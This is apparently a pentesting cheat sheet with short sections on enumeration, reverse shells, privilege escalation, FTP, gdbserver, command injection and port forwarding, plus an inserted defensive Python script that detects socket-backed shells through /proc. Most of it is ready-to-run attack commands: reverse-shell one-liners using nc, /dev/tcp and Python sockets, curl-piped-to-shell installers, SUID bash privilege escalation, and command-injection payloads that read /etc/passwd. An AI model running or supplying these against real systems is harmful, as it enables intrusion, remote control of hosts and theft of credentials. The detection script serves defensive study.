- Command Injection
- Enumeration
- FTP
- Gdbserver
- Network
- Port Forwarding
- Privilege Escalation
- Reverse Shell
- SCP
- Sudo
sudo -l
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
curl "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -Lo lse.sh
chmod +x lse.sh
./lse.sh -l1
msfconsole -q -x 'use exploit; set RHOSTS ip; set RPORT port; run; exit'
curl -sL https://github.com/stealthcopter/deepce/raw/main/deepce.sh -O
/etc/passwd
/etc/shadow
/www/html
/var/www
/srv/html
/usr/share/*
/home/user/.ssh
/etc/cron.d
/opt/
/usr/local/bin
/etc/nginx/sites-available/default
/etc/apache2/sites-enabled/000-default.conf
/proc/ contains useful information about the processes that are currently running.

| Directory | Description |
|---|---|
| /proc/PID/cmdline | Command line arguments. |
| /proc/PID/cwd | Link to the current working directory. |
| /proc/PID/environ | Values of environment variables. |
| /proc/PID/exe | Link to the executable of this process. |
| /proc/PID/fd | Directory, which contains all file descriptors. |
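
The same /proc entries are useful to a defender. The added example below (not part of the original page) walks `/proc/PID/exe`, `/proc/PID/fd` and `/proc/PID/cmdline` and flags shell processes whose stdin, stdout and stderr all point at a socket, which is what the socket-to-stdio reverse shell one-liners on this page produce. The `SHELLS` set, the function names and the fake PIDs and inode numbers are assumptions constructed for the example.

```python
import os
import tempfile

SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}  # assumption: shells worth flagging

def socket_backed_shells(proc_root="/proc"):
    """Return [(pid, exe, cmdline)] for shells whose fds 0, 1 and 2 are all sockets."""
    hits = []
    for entry in sorted(os.listdir(proc_root)):
        if not entry.isdigit():
            continue  # skip non-process entries such as /proc/meminfo
        base = os.path.join(proc_root, entry)
        try:
            exe = os.readlink(os.path.join(base, "exe"))
            targets = [os.readlink(os.path.join(base, "fd", str(n))) for n in (0, 1, 2)]
            with open(os.path.join(base, "cmdline"), "rb") as fh:
                # cmdline holds argv separated by NUL bytes
                cmdline = fh.read().replace(b"\0", b" ").decode(errors="replace").strip()
        except OSError:
            continue  # process exited, kernel thread, or no permission
        name = os.path.basename(exe.replace(" (deleted)", ""))
        if name in SHELLS and all(t.startswith("socket:[") for t in targets):
            hits.append((int(entry), exe, cmdline))
    return hits

def build_fake_proc(root):
    """Constructed sample data: a tiny /proc look-alike so the check runs offline."""
    samples = {
        "101": ("/usr/bin/bash", ["/dev/pts/0"] * 3, b"bash\0"),          # interactive login
        "202": ("/usr/bin/bash", ["socket:[48213]"] * 3, b"bash\0-i\0"),  # stdio on a socket
        "303": ("/usr/sbin/sshd", ["/dev/null", "socket:[5]", "socket:[5]"], b"sshd\0"),
    }
    for pid, (exe, fds, cmdline) in samples.items():
        os.makedirs(os.path.join(root, pid, "fd"))
        os.symlink(exe, os.path.join(root, pid, "exe"))
        for n, target in enumerate(fds):
            os.symlink(target, os.path.join(root, pid, "fd", str(n)))
        with open(os.path.join(root, pid, "cmdline"), "wb") as fh:
            fh.write(cmdline)
    return root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for pid, exe, cmdline in socket_backed_shells(build_fake_proc(tmp)):
            print(f"pid={pid} exe={exe} cmdline={cmdline!r}")
```

Run as root against the real `/proc` to see every process. The check matches only the direct socket-to-stdio pattern; a shell fed through a FIFO or pipe shows `pipe:[...]` targets and needs a separate rule, and a hit is a lead to investigate rather than proof.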
find / -user user 2>&-
find / -group group 2>&-
find / -user root -executable -type f 2>&- | grep -v /bin/
/sbin/getcap -r *
nc -lp 4444
# Client
resh ip 4444
# Server
resh 4444
nc ip 4444 -e /bin/bash
mkfifo /tmp/f;nc ip 4444 0</tmp/f|/bin/sh -i 2>&1|tee /tmp/f
bash -c 'bash -i >& /dev/tcp/ip/4444 0>&1'
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
bash -i
python3 -c 'import pty; pty.spawn("/bin/bash")'
script -qc /bin/bash /dev/null
rlwrap is a 'readline wrapper', a small utility that uses the GNU Readline library to allow the editing of keyboard input for any command. Use it when you cannot spawn a proper TTY.
rlwrap command
# Receiving connection from a reverse shell
rlwrap nc -lnvp port
# Connecting to the victim
rlwrap nc ip port
# Use the command's history file as a completion list (-f .) and put all words seen on in- and output on the completion list (-r)
rlwrap -r -f . nc ip port
/bin/cp /bin/bash /tmp/bash_up; /bin/chown user:group /tmp/bash_up; chmod g+s /tmp/bash_up; chmod u+s /tmp/bash_up
/tmp/bash_up -p
chmod 4755 /bin/bash
bash -p
Port: 21
File Transfer Protocol (FTP) is an application protocol in the TCP/IP suite. It transfers files from one computer to another by providing access to directories or folders on remote computers.
nmap --script ftp-* -p 21 ip
wget -m --user=user --password=fpassword ftp://ip
wget -m --user=anonymous --password=anonymous ftp://ip
Port: 1337
Gdbserver is a computer program that makes it possible to remotely debug other programs. A copy of the program you want to debug must be present on the target system.
$ gdb
(gdb) target extended-remote ip:port
(gdb) remote get remote_file local_file
(gdb) remote put local_file remote_file
;{cat,/etc/passwd}
;cat${IFS}/etc/passwd;
; cat /etc/passwd ;
$(cat /etc/passwd)
`cat /etc/passwd`
&& cat /etc/passwd &&
|| cat /etc/passwd ||
< <(cat /etc/passwd)
| cat /etc/passwd
"; cat /etc/passwd "
GTFOBins - Bypass local security restrictions
netstat -tulpn
for port in {1..65535}; do echo > /dev/tcp/ip/$port && echo "$port open"; done 2>/dev/null
for i in {1..254}; do (ping -c 1 192.168.1.${i} | grep "bytes from" | grep -v "Unreachable" &); done;
# Install chisel
curl https://i.jpillora.com/chisel! | bash
# Example: 8000 -> 4444
# Attacker machine:
chisel server -p 4444 --reverse
# Victim machine:
chisel client ip-server:4444 R:8000:127.0.0.1:8000
ssh -L 8080:127.0.0.1:8080 user@ip
scp -P port user@ip:path .
scp -P port file user@ip:path
scp -P 22 -r ~/.peda user@ip:/tmp/peda